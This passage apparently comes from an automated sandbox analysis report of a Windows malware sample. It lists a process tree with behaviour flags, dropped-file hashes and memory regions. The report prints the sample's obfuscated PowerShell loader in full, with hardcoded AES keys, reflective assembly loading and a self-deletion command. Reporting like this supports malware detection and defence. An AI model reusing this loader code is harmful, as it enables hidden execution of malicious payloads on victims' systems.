'')('omE0gz6POPNwhNmUAnPGH44LhwPPACLWik/KT0dk5wsKXAxtKag+L5FPGR5kaqhlGUck2HtfdRNBwrYMOEAetiGgAox0exmtDDnAYLadphZBvi4OP8B8BNL4k5y/z1AEr7oudmgyCQifH3aXxa/gUUa4xjDsSD2YTOub7PHlsdmqG91RSBUMJH4vfT2zptSsj0OSscQsY4xVPZ8OjeRKbzP+BjF+Uue1s9LcXQdrizsUEKJN4dY28g0skU19VzfudgJv7Qa+SS93YCgWa9n+oNhygZquca/xgmF4Z+su7WedF+8tBgUKzviRtdEdVgLq/OMSlirCLjvFnSHC2y9K1oTEEyD1mQB836kwPebOOTmBNH6vdn2bEQQYiF/vc3FItt5vYPuWyJGzUen95KOQjYu7YoPz/dFXDUgmI65vnuw=');$muibj = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($muibj, 0, $muibj.Length);$muibj = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($muibj);$DHHcr = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tYnkG6mWBgWnZf6oIR3L5A==');$DHHcr = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DHHcr, 0, $DHHcr.Length);$DHHcr = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DHHcr);$EQNXr = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5fF2zWzAZ0BefyD1XaGcLw==');$EQNXr = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($EQNXr, 0, $EQNXr.Length);$EQNXr = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($EQNXr);$mYQZS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3I7S8iNpJjrn0k9Lgckneg==');$mYQZS = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mYQZS, 0, $mYQZS.Length);$mYQZS = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mYQZS);$DbkFT = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('v8BsdeVWD9I78LbbRhRFrA==');$DbkFT = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DbkFT, 0, $DbkFT.Length);$DbkFT = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DbkFT);$jgfOd = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OEFFbXtp5W2U1hAoq0CpPw==');$jgfOd = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jgfOd, 0, $jgfOd.Length);$jgfOd = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jgfOd);$kveij0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1+Vym/OwDnC1v1RFNGQ5MA==');$kveij0 = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kveij0, 0, $kveij0.Length);$kveij0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kveij0);$kveij1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1UB7UYof3ztQu3+ei666DQ==');$kveij1 = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kveij1, 0, $kveij1.Length);$kveij1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kveij1);$kveij2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9594UuKb/Z+/WVWczIhxbQ==');$kveij2 = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kveij2, 0, $kveij2.Length);$kveij2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kveij2);$kveij3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lxkDZyakK1CM3mmPkfi6OQ==');$kveij3 = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kveij3, 0, $kveij3.Length);$kveij3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kveij3);$lkChZ.Dispose();$Elzpw1.Dispose();if (@(get-process -ea silentlycontinue $kveij3).count -gt 1) {exit};$ebqGe = [Microsoft.Win32.Registry]::$DbkFT.$mYQZS($kveij).$EQNXr($uYwHJ);$SceND=[string[]]$ebqGe.Split('\');$sNXpr=FJcTY(hufeg([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($SceND[1])));vUmWc $sNXpr (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$GiWwX = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($SceND[0]);$Elzpw = New-Object System.Security.Cryptography.AesManaged;$Elzpw.Mode = [System.Security.Cryptography.CipherMode]::CBC;$Elzpw.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$Elzpw.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ScFxiXv+iEo0UMCuEp0Dj6ldTafwKIFrpQdT06sepfk=');$Elzpw.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x90xMD7ECTiuD6SgY+FhCA==');$wCTZr = $Elzpw.('rotpyrceDetaerC'[-1..-15] -join '')();$GiWwX = $wCTZr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GiWwX, 0, $GiWwX.Length);$wCTZr.Dispose();$Elzpw.Dispose();$KHdof = New-Object System.IO.MemoryStream(, $GiWwX);$mdDGq = New-Object System.IO.MemoryStream;$PZsap = New-Object System.IO.Compression.GZipStream($KHdof, [IO.Compression.CompressionMode]::$kveij1);$PZsap.$jgfOd($mdDGq);$PZsap.Dispose();$KHdof.Dispose();$mdDGq.Dispose();$GiWwX = $mdDGq.ToArray();$cyNnW = $muibj | IEX;$YHPse = $cyNnW::$kveij2($GiWwX);$aMqIy = $YHPse.EntryPoint;$aMqIy.$kveij0($null, (, [string[]] ($XPhKE)))5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{5c4e2d40-574e-4626-b7fc-fb1db406b3d0}5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{fbfc520c-25ea-4826-8053-64daccd72cd3}5⤵
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{93d53fe0-737e-4969-aa1b-b22c1cb9e10c}5⤵
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{63d3beff-95f3-4a6b-a136-613c8b7c9e3f}5⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5328 -s 4766⤵
- Drops file in Windows directory
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{63ecd9b9-f51f-46d8-8c33-b343ae522a50}5⤵
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{4ae1e1b9-65f9-4fe5-b024-06ec17e466d7}5⤵
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{b69fd42f-7c0a-44e3-bc77-40f523d98cab}5⤵
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{4d1351a7-3c42-4deb-aba4-ce8531616c09}5⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netprofm -p -s netprofm1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵
-
C:\Windows\system32\sihost.exesihost.exe2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Modifies registry class
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies visibility of file extensions in Explorer
- Modifies visiblity of hidden/system files in Explorer
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uni.bat"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe"Uni.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function agDFc($vCpVI){ $Qviqn=[System.Security.Cryptography.Aes]::Create(); $Qviqn.Mode=[System.Security.Cryptography.CipherMode]::CBC; $Qviqn.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $Qviqn.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('eSyKXuxugFflvGlW9qE6Iqg8XcAom2v4/DjQoKKC570='); $Qviqn.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9iro50udEDaxZ/wkUff9RA=='); $FmMlx=$Qviqn.CreateDecryptor(); $return_var=$FmMlx.TransformFinalBlock($vCpVI, 0, $vCpVI.Length); $FmMlx.Dispose(); $Qviqn.Dispose(); $return_var;}function cZEYh($vCpVI){ $WLTiH=New-Object System.IO.MemoryStream(,$vCpVI); $KNxYU=New-Object System.IO.MemoryStream; $LOvEr=New-Object System.IO.Compression.GZipStream($WLTiH, [IO.Compression.CompressionMode]::Decompress); $LOvEr.CopyTo($KNxYU); $LOvEr.Dispose(); $WLTiH.Dispose(); $KNxYU.Dispose(); $KNxYU.ToArray();}function fELFD($vCpVI,$TXpag){ $fzHaG=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$vCpVI); $UtByz=$fzHaG.EntryPoint; $UtByz.Invoke($null, $TXpag);}$QLGin=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Uni.bat').Split([Environment]::NewLine);foreach ($AkEcQ in $QLGin) { if ($AkEcQ.StartsWith('SEROXEN')) { $fJBxd=$AkEcQ.Substring(7); break; }}$CjuJm=[string[]]$fJBxd.Split('\');$hxBpb=cZEYh (agDFc ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($CjuJm[0])));$OyvxC=cZEYh (agDFc ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($CjuJm[1])));fELFD $OyvxC (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));fELFD $hxBpb (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Deletes itself
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{949b51b3-d7a3-4ebe-9b7b-1661ca7262d3}4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{24d84389-231a-45b4-86b5-56b3d609a219}4⤵
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{3d8c1519-320c-40c1-ab91-c606a7ea7231}4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C PING localhost -n 8 >NUL & taskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe" & ATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe" & del /f "C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe" & exit4⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\PING.EXEPING localhost -n 85⤵
- Runs ping.exe
-
C:\Windows\system32\taskkill.exetaskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe"5⤵
- Kills process with taskkill
-
C:\Windows\system32\attrib.exeATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe"5⤵
- Views/modifies file attributes
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc1⤵
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{7966B4D8-4FDC-4126-A10B-39A3209AD251}1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 5328 -ip 53282⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 620 -p 4844 -ip 48442⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 668 -p 5320 -ip 53202⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.12df61c7-aae2-4716-90ad-976a15d02c0b.tmp.txtFilesize
13KB
MD5e49a91c35a3e93de1bfdf6616c2328ba
SHA1cabd8e485614f436db312cd874628c968b6c5a09
SHA256e4ec29d2fff5759311fe18056110c220b2e4f4266ba25c94ea103353c445dc14
SHA5123620e84c8b558accd88ba9621e1bc2b560401af9d16d3205d15d57964270a263fed4f525a51104ce51b5a2d62ee34d0131a7df9b61083e2e40c350c202c834b1
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.32159128-5bec-486f-b33c-77dc558e48ea.tmp.csvFilesize
38KB
MD5111de18d867f6605ec8ef95e8f62a61b
SHA1fb6478fcf6c9d38a6bedf96f3842a354d4cd894b
SHA2564590e1ce2e030e31eceba617c9efb3addf1507925916f6f93ae1a4df4b61dc58
SHA512586419d8007cb897d755b0a3feedda02ea7e633dc4481fa27ba854f3a5ed47fbbdb61c8cb39c00f4938c0fe3c50052b20e7f8a913ae459df79c993d5340224fe
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.aa6054ca-1e0c-498d-b7cc-7255b5d6d142.tmp.csvFilesize
38KB
MD508d26e314205e87435a655698dff0da1
SHA1ab6d7ea612bbf592f9b17964f5ac33b2ce9257bd
SHA256309932e023d4b18b6e7be2dc48aa75fbf571a1addab30f43eeed48bbc760c331
SHA512d3a4334f047a7e8510d0999214598e9c31f8699818e5836e25a20bda524e04f9c9de33a18c5a4e8dafab0877c5a45c0e014a88b42d3f46af3b1bdd952e620e56
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.ba1c0a87-68ab-441d-ba9d-f231ee7f9e98.tmp.csvFilesize
39KB
MD5880a1752754bba6bea1d8dec861954d0
SHA18ad513e12da9b3b4d1d5d99310aa5ca110e7bdfe
SHA256822342fb07b9e9740915e7be3a57082bbdc6420d057e2474e59c26804f4900cd
SHA51269a5ea7a7575c4c76a3a470eb45818dd0bbba9d67f115306c5616c5982853b22cb44d759bdfea8e4b12db632eba7a706cbf03791a042331f2e784fc325fdfa44
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.bc3067cb-905f-4386-abab-9cdf5dd44fda.tmp.txtFilesize
13KB
MD586b5f773c960d5f87983d7a2324383c3
SHA16ce7f749fd5bf242ae1bd7a579c644f1c8498202
SHA25603209b3f7b23d01458ea97c4b65858e6c06ab73eba2d287076f9e92a06359f64
SHA5126f1b9a59ff3f06650bde1eea56b9784845020b41896df5b00d18e5a78d46ab88de3a263334f009f5becf06e97fd5132109a5bf9753d5a84ad18139387a4ba8e4
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.c9bbd7d2-df8b-463d-b9bd-8d546ab18ce1.tmp.txtFilesize
13KB
MD56e34153447e6d77a48e368983221a9c8
SHA1233e5a7f8bca36c670734813a3d91ed4dcd2cc71
SHA2566a4964794e07a3a317258cd459ab1662784d5fa7897132952fea29fd4112c543
SHA512fb47768a32cb1525b6929217fd58349511a8b514a9a81ae64d86c214dd45160a170bb0a301fbc747c728a91f495169d218aa1cd2784300f8f77504c16fa9e7a9
-
C:\Users\Admin\AppData\Local\Temp\Uni.bat.exeFilesize
440KB
MD50e9ccd796e251916133392539572a374
SHA1eee0b7e9fdb295ea97c5f2e7c7ba3ac7f4085204
SHA256c7d4e119149a7150b7101a4bd9fffbf659fba76d058f7bf6cc73c99fb36e8221
SHA512e15c3696e2c96874242d3b0731ce0c790387ccce9a83a19634aed4d1efef72ce8b8fa683069950d652b16cd8d5e9daae9910df6d0a75cb74fdbe90ae5186765d
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5qk3ivon.tpa.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Windows\$sxr-cmd.exeFilesize
324KB
MD5c5db7b712f280c3ae4f731ad7d5ea171
SHA1e8717ff0d40e01fd3b06de2aa5a401bed1c907cc
SHA256f6c9532e1f4b66be96f0f56bd7c3a3c1997ea8066b91bfcc984e41f072c347ba
SHA512bceaf7dc30f2c99b40b7025a5eb063f3131a1ef9349fdf356720eaef838bcf58ce3d5e3bad9459ddd2f872df430bdb66a766a5acff5d3bbc738eba8945cb0a89
-
C:\Windows\$sxr-mshta.exeFilesize
32KB
MD5356e04e106f6987a19938df67dea0b76
SHA1f2fd7cde5f97427e497dfb07b7f682149dc896fb
SHA2564ed8a115fa1dcfd532397b800775c1b54d2d407b52118b5423e94ff1ce855d7e
SHA512df1c655fa3a95e001084af8c3aa97c54dbcb690210e1353dd836702cfb4af3c857449df62aa62d7ab525ffb4e0dc1552181dfcdee2c28f4af5c20df6d95811cd
-
C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04Filesize
412B
MD545a80505f42379c1c9515dbe048e2633
SHA1070d78651bed3deab9c80048a7ff6869a8b9b986
SHA256cace9cb72a714cce6f7f50ab410fbd5cc11f06d0702a6ceb4157d619e3e2fac1
SHA5129b9197c3e5bd240d370b31d622328baa5ca8d2edab573e119c19e67b9d3ead7a3c26cd901b036538a74015b522435e95743943801a63b26caee1e3837901c8a1
-
memory/460-108-0x000002667FCF0000-0x000002667FD17000-memory.dmpFilesize
156KB
-
memory/460-110-0x00007FFEF5250000-0x00007FFEF5260000-memory.dmpFilesize
64KB
-
memory/632-107-0x00007FFEF5250000-0x00007FFEF5260000-memory.dmpFilesize
64KB
-
memory/632-101-0x000001F76A7D0000-0x000001F76A7F2000-memory.dmpFilesize
136KB
-
memory/632-102-0x000001F76AA50000-0x000001F76AA77000-memory.dmpFilesize
156KB
-
memory/688-112-0x00007FFEF5250000-0x00007FFEF5260000-memory.dmpFilesize
64KB
-
memory/688-104-0x000001D0BB9C0000-0x000001D0BB9E7000-memory.dmpFilesize
156KB
-
memory/720-119-0x00007FFEF5250000-0x00007FFEF5260000-memory.dmpFilesize
64KB
-
memory/720-118-0x000001571DB70000-0x000001571DB97000-memory.dmpFilesize
156KB
-
memory/996-115-0x00007FFEF5250000-0x00007FFEF5260000-memory.dmpFilesize
64KB
-
memory/996-114-0x000001D714AB0000-0x000001D714AD7000-memory.dmpFilesize
156KB
-
memory/1036-122-0x000002A371EA0000-0x000002A371EC7000-memory.dmpFilesize
156KB
-
memory/1036-123-0x00007FFEF5250000-0x00007FFEF5260000-memory.dmpFilesize
64KB
-
memory/1044-126-0x000001BAF97D0000-0x000001BAF97F7000-memory.dmpFilesize
156KB
-
memory/1044-127-0x00007FFEF5250000-0x00007FFEF5260000-memory.dmpFilesize
64KB
-
memory/1100-135-0x0000021B26690000-0x0000021B266B7000-memory.dmpFilesize
156KB
-
memory/1100-136-0x00007FFEF5250000-0x00007FFEF5260000-memory.dmpFilesize
64KB
-
memory/1160-138-0x000002044A2E0000-0x000002044A307000-memory.dmpFilesize
156KB
-
memory/1360-80-0x00000224BA120000-0x00000224BA2E2000-memory.dmpFilesize
1.8MB
-
memory/1360-78-0x00000224B9D80000-0x00000224B9DD0000-memory.dmpFilesize
320KB
-
memory/1360-64-0x00000224C1D30000-0x00000224C24FA000-memory.dmpFilesize
7.8MB
-
memory/1360-65-0x00000224C2500000-0x00000224C293E000-memory.dmpFilesize
4.2MB
-
memory/1360-66-0x00000224C2940000-0x00000224C29F2000-memory.dmpFilesize
712KB
-
memory/1360-67-0x00000224B9160000-0x00000224B9182000-memory.dmpFilesize
136KB
-
memory/1360-68-0x00007FFF351C0000-0x00007FFF353C9000-memory.dmpFilesize
2.0MB
-
memory/1360-417-0x00000224BAE70000-0x00000224BB398000-memory.dmpFilesize
5.2MB
-
memory/1360-93-0x00007FFF345E0000-0x00007FFF3469D000-memory.dmpFilesize
756KB
-
memory/1360-61-0x00007FFF351C0000-0x00007FFF353C9000-memory.dmpFilesize
2.0MB
-
memory/1360-79-0x00000224B9E90000-0x00000224B9F42000-memory.dmpFilesize
712KB
-
memory/1360-62-0x00007FFF345E0000-0x00007FFF3469D000-memory.dmpFilesize
756KB
-
memory/1360-63-0x00000224B93A0000-0x00000224B9924000-memory.dmpFilesize
5.5MB
-
memory/1360-90-0x00000224B9DD0000-0x00000224B9E0C000-memory.dmpFilesize
240KB
-
memory/1360-91-0x00000224B9D30000-0x00000224B9D7E000-memory.dmpFilesize
312KB
-
memory/1360-92-0x00007FFF351C0000-0x00007FFF353C9000-memory.dmpFilesize
2.0MB
-
memory/1360-94-0x00000224B9E10000-0x00000224B9E46000-memory.dmpFilesize
216KB
-
memory/2452-33-0x0000000000400000-0x0000000000406000-memory.dmpFilesize
24KB
-
memory/2452-37-0x0000000000400000-0x0000000000406000-memory.dmpFilesize
24KB
-
memory/2604-35-0x0000000140000000-0x0000000140004000-memory.dmpFilesize
16KB
-
memory/2604-32-0x0000000140000000-0x0000000140004000-memory.dmpFilesize
16KB
-
memory/2624-25-0x000001E0BFAB0000-0x000001E0BFB56000-memory.dmpFilesize
664KB
-
